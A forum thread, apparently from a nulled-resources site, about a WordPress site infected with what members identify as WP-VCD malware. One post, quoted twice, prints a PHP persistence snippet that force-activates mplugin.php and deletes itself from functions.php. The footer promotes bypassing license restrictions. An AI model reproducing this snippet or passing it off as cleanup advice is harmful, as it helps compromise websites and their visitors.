Am I under attack?

simis0702 · Dec 18, 2020

aboooodaj said:
Hallo
Delete these files and codes
mplugin.php
monit.php
class.plugin-modules.php

in functions.php

function true_plugins_activate() {
$active_plugins = get_option('active_plugins');
$activate_this = array(
'mplugin.php'
);
foreach ($activate_this as $plugin) {
if (!in_array($plugin, $active_plugins)) {
array_push($active_plugins, $plugin);
update_option('active_plugins', $active_plugins);
}
}
$new_active_plugins = get_option('active_plugins');
if (in_array('mplugin.php', $new_active_plugins)) {
$functionsPath = dirname(__FILE__) . '/functions.php';
$functions = file_get_contents($functionsPath);

$start = stripos($functions, "function true_plugins_activate()");
$end = strripos($functions, "true_plugins_activate");
$endDelete = $end + mb_strlen("true_plugins_activate") + 3;

if($start && $end) {
$str = substr($functions, 0, $start);
$str .= substr($functions, $endDelete);
file_put_contents($functionsPath, $str);
}
$script = file_get_contents('/mywebseit/class.plugin-modules.php');
file_put_contents('/mywebseit/wp-content/plugins/dflip/class.plugin-modules.php', '');
}
}

add_action('init', 'true_plugins_activate');

and
Change all passwords
User and database

another reason for me learn web dev before bothering with wordpress lol

drslims · Dec 18, 2020

aboooodaj said:
Hallo
Delete these files and codes
mplugin.php
monit.php
class.plugin-modules.php

in functions.php

function true_plugins_activate() {
$active_plugins = get_option('active_plugins');
$activate_this = array(
'mplugin.php'
);
foreach ($activate_this as $plugin) {
if (!in_array($plugin, $active_plugins)) {
array_push($active_plugins, $plugin);
update_option('active_plugins', $active_plugins);
}
}
$new_active_plugins = get_option('active_plugins');
if (in_array('mplugin.php', $new_active_plugins)) {
$functionsPath = dirname(__FILE__) . '/functions.php';
$functions = file_get_contents($functionsPath);

$start = stripos($functions, "function true_plugins_activate()");
$end = strripos($functions, "true_plugins_activate");
$endDelete = $end + mb_strlen("true_plugins_activate") + 3;

if($start && $end) {
$str = substr($functions, 0, $start);
$str .= substr($functions, $endDelete);
file_put_contents($functionsPath, $str);
}
$script = file_get_contents('/mywebseit/class.plugin-modules.php');
file_put_contents('/mywebseit/wp-content/plugins/dflip/class.plugin-modules.php', '');
}
}

add_action('init', 'true_plugins_activate');

and
Change all passwords
User and database

Thanks dude. I made a new installation. Maybe he can help someone else.

frizzel · Dec 18, 2020

@simis0702 @drslims CAUTION! I think the code you both quoted has nothing to do with the problem in the thread, but instead is malicious code itself (class.plugin-modules.php is related to the well-known WP-VCD malware).

I have reported the post by this new user aboooodaj.

MrSam_1 · Dec 18, 2020

Tho is a new user he have a valid point saying "delete these files and codes" also mentioning the files and code from functions.php
As in OP was mentioned mplugin.php it seem related to thread.
But this is my sole opinion you can ask others too.

die2mrw007 · Dec 18, 2020

Please refer this. https://themiracletech.com/latest/m...cplugin-how-to-completely-remove-from-server/

simis0702 · Dec 18, 2020

WTF REALLY IS IT MALICIOUS CODE??? BECAUSE MY BROWSER SAID THAT THERE WAS SOMETHING MALICIOUS IN YOUR BROWSER, A FILE CALLED LOAD.PHP
DOES THAT MEAN THAT HE INSERTED MALICIOUS CODE?K????

@frizzel @slvrsteele

simis0702 · Dec 18, 2020

harmful software, fu**... boys can you please tell me what i should do, appearantly I had developper mode on and there was a harmful software installed on my browser...please

MrSam_1 · Dec 18, 2020

First of all why would you keep developer mode on? You never do that when browsing.

simis0702 · Dec 18, 2020

slvrsteele said:
First of all why would you keep developer mode on? You never do that when browsing.

totally forgot to put that of indeed.....

MrSam_1 · Dec 18, 2020

Disable your extensions and see which one triggered the warning by enabling one by one. Then remove the harmful one.

simis0702 · Dec 18, 2020

slvrsteele said:
First of all why would you keep developer mode on? You never do that when browsing.

should i take some action or not, the harmful software is already deleted by google ( it was probably an extension

mei2020 · Dec 18, 2020

simis0702 said:
should i take some action or not, the harmful software is already deleted by google ( it was probably an extension

Uninstall your infected browser using iobit unistaller (check remove residual), reinstall the browser.

simis0702 · Dec 18, 2020

mei2020 said:
Uninstall your infected browser using iobit unistaller (check remove residual), reinstall the browser.

okay i will do that, thank you, luckily i have the pro version of it

Efacid · Dec 19, 2020

frizzel said:
@simis0702 @drslims CAUTION! I think the code you both quoted has nothing to do with the problem in the thread, but instead is malicious code itself (class.plugin-modules.php is related to the well-known WP-VCD malware).

I have reported the post by this new user aboooodaj.

You are absolutely right. But on the funny site this piece of PHP will not work ether...to many "Translation issues".

Have a great day

Aceee · Dec 19, 2020

maybe because you are using a plugins or themes with malware? Or nulled you download from other site.

fatihco · Oct 1, 2021

drslims said:
A site protected by Wordfence. I checked again. It could not detect any problems.

But when I check the database over Cpanel, there are malicious encodings in the "wp_options" table as written here. I managed to delete these codes from the table as in the article.

The words I searched in the database:
default_mont_options
ad_code
hide_admin
hide_logged_in
display_ad
search_engines
auto_update
ip_admin
cookies_admin
logged_admin
log_install

Plugins I have installed recently:

Betterdocs pro:
Elementor Pro (Last version):
Formidable pro:
Liker:
Monsterinsights pro:
Loco Translate Pro:
Yoast seo premium:

I had to remove them all.

I think I will have to implement a new wordpress installation. It will cost me 200 hours. Because I did not find the current situation very safe. I cleaned it up a bit, but I'm not comfortable yet.

It's in your theme, go to: Wordpress Folder > wp-content > themes > choose then theme you have installed > and then you will see a file with the name: class.theme-modules.php > Go ahead and delete it > if you delete mplugin.php file, the class.theme-modules.php will generate it again! I hope it helps

PS: it's not the plugins, it's the Nulled Theme

Am I under attack?

Welcome to Original Babiato! All Resource are Free and No downloading Limit.. Join Our Official Telegram Channel For updates Bypass All the resource restrictions/Password/Key? Read here! Read Before submitting Resource Read here!Support Our Work By Donating Click here!

Join Our Official Telegram Channel For updates Bypass All the resource restrictions/Password/Key? Read here! Read Before submitting Resource Read here!

Support Our Work By Donating Click here!

Active member

Member

Well-known member

Well-known member

Senior Developer

Active member

Active member

Well-known member

Active member

Well-known member

Active member

Active member

Active member

Well-known member

Active member

New member

Forum statistics

Share this page

Welcome to Original Babiato! All Resource are Free and No downloading Limit..
Join Our Official Telegram Channel For updates
Bypass All the resource restrictions/Password/Key? Read here!
Read Before submitting Resource Read here!
Support Our Work By Donating Click here!

Join Our Official Telegram Channel For updates
Bypass All the resource restrictions/Password/Key? Read here!
Read Before submitting Resource Read here!